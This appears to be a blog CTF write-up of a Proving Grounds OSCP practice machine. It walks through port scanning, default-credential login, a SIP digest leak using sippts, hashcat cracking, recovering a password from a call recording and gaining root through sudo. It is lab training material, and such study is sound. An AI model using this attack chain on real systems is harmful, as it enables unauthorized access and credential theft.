← Back to Blog

OSCP Prep Machine 005

Type: CTF Writeup Platform: Proving Grounds Difficulty: Intermediate/Hard
OSCP VOIP SIP Audio Analysis Hash Cracking

This machine was rated intermediate by OffSec and very hard by the community. I found it quite difficult due to unfamiliarity with VOIP services, but it was one of my favorite machines and a fantastic learning experience.

Enumeration

Service enumeration was performed using a custom bash script optimized for OSCP labs. The script uses rustscan for fast port discovery followed by targeted nmap scans.

Port Scans:

Open 192.168.96.156:22
Open 192.168.96.156:80
Open 192.168.96.156:8000

WhatWeb Results:

http://192.168.96.156 [302 Found] Apache[2.4.41], Cookies[PHPSESSID]
http://192.168.96.156/login.php [200 OK] Title[VOIP Manager]
VOIP Login

The web server on port 8000 featured a login page. Default credentials admin:admin granted entry to a VOIP system interface.

VOIP Portal

VOIP SIP Digest Leak

After researching VOIP penetration testing, I discovered the sippts toolset. Using SIPDigestLeak.py:

[+] Target: 192.168.96.156:5060/UDP
[=>] Request INVITE
[<=] Response 180 Ringing
[<=] Response 200 OK

Auth=Digest username="adm_sip", uri="sip:127.0.0.1:5060",
password="074b62fb6c21b84e6b5846e6bb001f67", algorithm=MD5

Foothold

Using hashcat, I cracked the MD5 hash and used the credentials to log into the VOIP Manager service on port 80.

VOIP Admin Panel

The webapp had downloadable audio files (call recordings). Most were corrupted, but one was not. The challenge was to decode the raw audio file.

Stream Metadata

RAW Audio Conversion with sox

Using the metadata from the Stream Rates tab:

encoder: Lavf58.29.100
Stream #0:0: Audio: pcm_mulaw, 8000 Hz, mono, s16, 64 kb/s

Converting with the correct parameters:

sox -r 8000 -e unsigned -b 8 -c 1 2138.raw test2.wav

The audio revealed: "Your password has been changed to [redacted]"

Using the discovered password with user IDs from the information tab, SSH authentication was successful.

Privilege Escalation

$ sudo -l
User may run the following commands:
    (ALL : ALL) ALL

$ sudo su
root@###P:/# id && whoami
uid=0(root) gid=0(root) groups=0(root)
root

Persistence

After gaining root access, persistence was obtained by accessing the SSH RSA private key.

Recap

This machine was my first experience using VOIP-specific tools and was an amazing learning experience. The attack pathway required working with VOIP protocols and audio processing - something entirely new to me.